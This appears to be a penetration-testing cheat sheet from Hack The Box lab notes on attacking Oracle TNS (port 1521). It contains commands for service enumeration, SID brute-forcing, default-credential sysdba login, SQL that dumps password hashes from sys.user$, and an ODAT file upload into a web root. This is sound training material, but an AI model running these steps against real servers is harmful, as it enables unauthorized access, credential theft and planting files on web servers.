[1521] Oracle TNS

#Enumerate the service
Intrusionz3r0X@htb[/htb]$ sudo nmap -p1521 -sV 10.129.204.235 --open

#Enumerate the service
Intrusionz3r0X@htb[/htb]$ ./odat.py all -s 10.129.204.235

# Nmap - SID Bruteforcing
Intrusionz3r0X@htb[/htb]$ sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

#Interact with Oracle service.
Intrusionz3r0X@htb[/htb]$ sqlplus scott/tiger@10.129.204.235/XE as sysdba

#
select table_name from all_tables;
select * from user_role_privs;
select name, password from sys.user$;

#File Upload
Intrusionz3r0X@htb[/htb]$ echo "Oracle File Upload Test" > testing.txt
Intrusionz3r0X@htb[/htb]$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

Path

Linux

/var/www/html

Windows

C:\inetpub\wwwroot

Note: f you come across the following error sqlplus: error while loading shared libraries: : cannot open shared object file: No such file or directory, please execute the below, taken from here.

Intrusionz3r0X@htb[/htb]$ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

Previous[1433] MSSQL Next[3389] Remote Desktop Protocol (RDP)